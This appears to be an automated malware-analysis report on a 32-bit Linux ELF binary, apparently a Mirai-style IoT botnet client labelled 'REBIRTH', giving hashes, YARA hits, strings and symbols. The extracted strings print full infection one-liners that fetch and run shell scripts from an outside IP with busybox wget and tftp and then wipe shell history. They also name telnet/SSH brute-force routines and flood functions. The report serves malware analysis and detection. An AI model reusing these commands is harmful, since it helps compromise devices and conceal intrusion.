Report #1590 check_circle

Binary
ABI
ELFOSABI_SYSV
Size
98.52KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
74b4c9ff209fe609737c69b326ee7d46
sha1
da0acff001489d9b5a5cf1e6c63bd63ee922dd09
crc32
0xa1de1a24
sha224
b3902db5c3f072cb560521a32c3c13b55f94112797fb746693cd46dd
sha256
4e99b1006ed58305f2d0b222b3dd92032661fee310da503cd4adc0443dc31c76
sha384
f696e984cf95f4d47fc61247dc02fca4446e2adfac388670e4ab1cd778956a62e4ac945f8bd3ec80411a83f091e3b0ae
sha512
521bfda7e29fd098af4728054e6c59985b6527c4a06715a7b9649cd3c35fcbe3a0cf3b1f23da9444623f8ea8b84fd571b121b025e0ea691d4159115e384a50c0
ssdeep
3072:0SmbLirEq/nvisMz9KeopXmS0veewQ08N:0B9MKsMseopXmS0veewQ08N
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
maldoc_getEIP_method_1, domain, is__elf, url, IP, contentis_base64, Misc_Suspicious_Strings

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys

Home

Proc

Password

Suspicious
False cancel
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4, Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911, Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2, Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285, Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7, BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100, Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36, Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36, Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57), 107.170.96.217:777, cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 107.170.96.217/bin.sh;chmod 777;sh bin.sh;busybox tftp -g 107.170.96.217 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 107.170.96.217 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history;cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 107.170.96.217/bins.sh;chmod 777;sh bins.sh;busybox tftp -g 107.170.96.217 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 107.170.96.217 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history, cd /tmp/;wget http://107.170.96.217/bins.sh;sh bins.sh;rm -rf bins.sh;cd /tmp/;wget http://107.170.96.217/bin.sh;sh bin.sh;rm -rf bis.sh, http://107.170.96.217/scan.py, 107.170.96.217, nameserver 8.8.8.8, nameserver 8.8.4.4
URLs
cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 107.170.96.217/bin.sh;chmod 777;sh bin.sh;busybox tftp -g 107.170.96.217 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 107.170.96.217 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history;cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 107.170.96.217/bins.sh;chmod 777;sh bins.sh;busybox tftp -g 107.170.96.217 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 107.170.96.217 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history, cd /tmp/;wget http://107.170.96.217/bins.sh;sh bins.sh;rm -rf bins.sh;cd /tmp/;wget http://107.170.96.217/bin.sh;sh bin.sh;rm -rf bis.sh, http://107.170.96.217/scan.py, cd %s;rm -rf scan.py, cd %s;python scan.py 376 B 119.93 lol, cd %s;python scan.py 376 B 91.98 2, cd %s;python scan.py 376 B 118.173 2, cd %s;python scan.py 376 B 91.99 2, cd %s;python scan.py 376 B 92.99 2, cd %s;python scan.py 376 B %s 2
Mails

Suspicious
True check_circle
Strings
List
cd /tmp/;wget http://107.170.96.217/bins.sh;sh bins.sh;rm -rf bins.sh;cd /tmp/;wget http://107.170.96.217/bin.sh;sh bin.sh;rm -rf bis.sh
http://107.170.96.217/scan.py
tftp2.sh
BIN.sh
tftp1.sh
ftp1.sh
cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 107.170.96.217/bin.sh;chmod 777;sh bin.sh;busybox tftp -g 107.170.96.217 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 107.170.96.217 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history;cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 107.170.96.217/bins.sh;chmod 777;sh bins.sh;busybox tftp -g 107.170.96.217 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 107.170.96.217 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history
107.170.96.217:777
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19
nameserver 8.8.4.4
nameserver 8.8.8.8
%s %s HTTP/1.1
cd %s;python scan.py 376 B %s 2
[ REBIRTH ] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s
[ REBIRTH ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s
[ REBIRTH ] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s
cd %s;python scan.py 376 B 92.99 2
cd %s;python scan.py 376 B 91.99 2
cd %s;python scan.py 376 B 91.98 2
cd %s;rm -rf scan.py
[ REBIRTH ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s
[ REBIRTH ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s
cd %s;python scan.py 376 B 119.93 lol
cd %s;python scan.py 376 B 118.173 2
[ REBIRTH ] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
/etc/resolv.conf
User-Agent: %s
[ CONNECTED ] IP: %s || Arch Type: %s || Endianness Type: %s]
pkill -9 %s;killall -9 %s;
Network is down
Machine is not on the network
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
No route to host
Host is down
107.170.96.217
Host: %s
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
been_there_done_that.3001
[Updating] [%s:%s]
SSH_Usernames
SSH_Passwords
been_there_done_that
_fwrite.c
open.c
write.c
contains_fail
Transport endpoint is not connected
No such process
Block device required
No such device or address
Remote address changed
Operation now in progress
Too many open files
Link has been severed
Too many open files in system
No such device
Too many links
Object is remote
Connection reset by peer
pass
Is a named type file
pass
BINS_HOST_IP
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
rm -rf %s;
cd %s;wget %s;
Operation not permitted
sudo mkdir %s;
[PYTHON] Downloading Scanner.
[PYTHON] Installing Dependencies.
[PYTHON] Killing Python Scanning Process.
[PYTHON] Done with installation.
dnslookup.c
Too many users
__GI_execl
__dns_lookup
cunty*IoT*
__GI_fflush_unlocked
/etc/config/hosts
__libc_nanosleep
__GI_sleep
__nameserver
__open_nameservers
__socketcall
Bot_Killer_Binarys
__GI_execve
Mirai_Usernames
Telnet_Usernames
__register_frame_info_bases
/etc/hosts
Telnet_Passwords
Mirai_Passwords
_Jv_RegisterClasses

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, client.c, c, Q, i.4420, printchar, prints, printi, print, ipState.5170, ipState.5272, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, access.c, chdir.c, close.c, fork.c, getdtablesize.c, getpid.c, getppid.c, getrlimit.c, kill.c, open.c, prctl.c, read.c, select.c, seteuid.c, setresuid.c, setreuid.c, setuid.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, sprintf.c, vsnprintf.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.4160, _fixed_buffers, _wcommit.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, spec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1330, _string_syserrmsgs.c, bcopy.c, strcasestr.c, strtok.c, next_start.1278, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, gethostbyname.c, buf.5162, h.5161, gethostbyname_r.c, connect.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.3001, sigaction.c, __restore_rt, __restore, libc/sysdeps/linux/i386/vfork.S, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, ioctl.c, munmap.c, nanosleep.c, sbrk.c, sigprocmask.c, wait4.c, __C_ctype_tolower.c, errno.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, memchr.c, memmove.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, raise.c, dl-support.c, brk.c, __syscall_error.c, poll.c, fclose.c, fopen.c, fseeko.c, fseeko64.c, _adjust_pos.c, _fopen.c, _cs_funcs.c, fgets.c, fflush_unlocked.c, fgets_unlocked.c, strcmp.c, strncat.c, rawmemchr.c, strspn.c, strdup.c, ntop.c, inet_pton4, xdigits.3285, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, llseek.c, tolower.c, fgetc_unlocked.c, strcasecmp.c, encoded.c, decoded.c, lengthd.c, _READ.c, _rfill.c, _trans2r.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, UpdateNameSrvs, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __socketcall, __GI___ctype_b, __GI_memchr, BINS7, __GI___glibc_strerror_r, waitpid, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, BINS13, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, sysconf, BIN, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, __GI_h_errno, contains_fail, __length_question, __GI___ctype_toupper, __GI_strcasecmp, advance_telstate, __GI_tolower, BINS3, recv, connect, __encode_question, __GI___uClibc_fini, numpids, __encode_header, __GI_strncat, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, inet_pton, __GI_vsnprintf, memmove, __bsd_signal, __GI_strpbrk, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, getc_unlocked, __ctype_b, __GI_random_r, errno, getegid, read_until_response, __GI_sbrk, SSH_Usernames, zprintf, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, __libc_getpid, BINS2, wildString, __xpg_strerror_r, SendUDP, fcntl64, prctl, memcpy, TelnetScanner, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, __GI_fgets, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, FTP1, __pthread_mutex_init, tolower, getuid, system, __open_etc_hosts, malloc, isatty, sleep, __GI_atol, vsnprintf, __dns_lookup, __GI_read, __C_ctype_tolower, random_r, __dso_handle, clock_getres, gethostbyname_r, tcpcsum, reset_telstate, BINS5, socket, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, BINS11, __GI_open, __GI_strchr, __searchdomain, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI_inet_ntoa, send, __fgetc_unlocked, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, SendSTD, BINS10, __GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, RandomPythonRange, strtol, __libc_lseek64, strnlen, rawmemchr, TFTP2, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, Payload, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, Mirai_Usernames, RemoveTempDirs, __GI_execl, __GI_srandom_r, __GI___ctype_tolower, write, environ, __GI_close, getBuild, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, Bot_Killer_Binarys, BINS6, __GI_brk, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, TFTP1, ntohl, __GI_fseek, __GI_setreuid, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, __GI_strcmp, __GI_memmove, setstate, __decode_dotted, __stdio_READ, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, stdin, __GI_isatty, strcasestr, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, BINS1, signal, read, __decode_header, __GI___h_errno_location, __GI_memcpy, strcoll, wcsrtombs, _stdio_user_locking, BINS8, strncpy, strcasecmp, htonl, sendto, Python_Temp_Directory, __C_ctype_toupper, __GI___C_ctype_b, Telnet_Passwords, __GI_gethostbyname_r, __GI_strncpy, MiraiIPRanges, __libc_send, __GI___xpg_strerror_r, currentServer, __GI___C_ctype_tolower, Mirai_Passwords, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, getEndianness, ClearHistory, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, __GI_strcasestr, Busybox_Payload, fork, Python_File_Location, __stdio_rfill, strncat, setresuid, __GI_sleep, sigaction, __GI_gethostbyname, SendTCP, _dl_phdr, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, _pthread_cleanup_push_defer, index, processCmd, __sigismember, fopen, __bss_start, setreuid, __libc_open, get_telstate_host, memset, __GI_socket, main, MiraiScanner, __glibc_strerror_r, listFork, __GI___C_ctype_tolower_data, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, inet_ntoa, getppid, tcgetattr, __C_ctype_tolower_data, time, __libc_system, __GI_abort, poll, seteuid, __get_hosts_byname_r, __stdio_init_mutex, __GI__exit, strcmp, advances2, __nameserver, data_start, __GI_sysconf, __h_errno_location, Telnet_Usernames, matchPrompt, SSH_Passwords, __C_ctype_b_data, __GI_inet_pton, gethostbyname, _stdio_fopen, _fini, __GI_chdir, __vfork, __GI_mmap, contains_success, sprintf, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, socket_connect, __GI_waitpid, _stdio_term, __decode_answer, __GI_signal, stderr, fails, commServer, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __libc_fork, __atexit_lock, scanPid, rand_cmwc, __GI_setresuid, advances, __libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, contains_string, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, BINS_HOST_IP, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, contains_response, access, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, __searchdomains, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, __GI_connect, __curbrk, __libc_poll, _dl_phnum, _fpmaxtostr, __errno_location, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, __C_ctype_toupper_data, _dl_aux_init, _errno, atoi, successes, BINS9, _stdio_openlist_del_lock, __GI_inet_aton, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, PythonRanges, open, Temp_Directorys, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, BINS4, BINS12, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, __GI_inet_addr, __GI_seteuid, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __GI___errno_location, fcntl, setuid, read_with_timeout, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, close, __libc_connect, __GI_strlen, mainCommSock, pids, SendHTTP, strpbrk, _load_inttype, raise, useragents, free, sigprocmask
Number
756
Reason
None
Suspicious
False cancel
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False cancel
Segments
Number
3
Suspicious
False cancel
Compilers
List
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2
Identified
163
Suspicious
True check_circle
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , frame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i386/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , client.c, , c, , Q, , i.4420, , printchar, , prints, , printi, , print, , ipState.5170, , ipState.5272, , __syscall_fcntl.c, , __syscall_fcntl64.c, , _exit.c, , access.c, , chdir.c, , close.c, , fork.c, , getdtablesize.c, , getpid.c, , getppid.c, , getrlimit.c, , kill.c, , open.c, , prctl.c, , read.c, , select.c, , seteuid.c, , setresuid.c, , setreuid.c, , setuid.c, , time.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_toupper.c, , __errno_location.c, , sprintf.c, , vsnprintf.c, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.4160, , _fixed_buffers, , _wcommit.c, , _vfprintf_internal.c, , _charpad, , _fp_out_narrow, , spec_base.4370, , prefix.4371, , _ppfs_init.c, , _ppfs_prepargs.c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , type_sizes, , spec_flags.4372, , qual_chars.4377, , spec_chars.4373, , spec_ranges.4374, , spec_or_mask.4375, , spec_and_mask.4376, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strchr.c, , strcpy.c, , strlen.c, , strncpy.c, , strnlen.c, , strstr.c, , __glibc_strerror_r.c, , __xpg_strerror_r.c, , unknown.1330, , _string_syserrmsgs.c, , bcopy.c, , strcasestr.c, , strtok.c, , next_start.1278, , isatty.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2827, , inet_makeaddr.c, , gethostbyname.c, , buf.5162, , h.5161, , gethostbyname_r.c, , connect.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , socket.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , free.c, , __malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _stdlib_strto_l.c, , exit.c, , execl.c, , sleep.c, , sysconf.c, , __uClibc_main.c, , __pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_done_that.3001, , sigaction.c, , __restore_rt, , __restore, , libc/sysdeps/linux/i386/vfork.S, , libc/sysdeps/linux/i386/mmap.S, , __socketcall.c, , __syscall_rt_sigaction.c, , clock_getres.c, , execve.c, , getegid.c, , geteuid.c, , getgid.c, , getpagesize.c, , getuid.c, , ioctl.c, , munmap.c, , nanosleep.c, , sbrk.c, , sigprocmask.c, , wait4.c, , __C_ctype_tolower.c, , errno.c, , __h_errno_location.c, , wcrtomb.c, , wcsrtombs.c, , wcsnrtombs.c, , _WRITE.c, , _fwrite.c, , _trans2w.c, , _load_inttype.c, , _store_inttype.c, , _uintmaxtostr.c, , _fpmaxtostr.c, , fmt, , exp10_table, , memchr.c, , memmove.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , dnslookup.c, , mylock, , static_ns, , static_id, , opennameservers.c, , get_hosts_byname_r.c, , raise.c, , dl-support.c, , brk.c, , 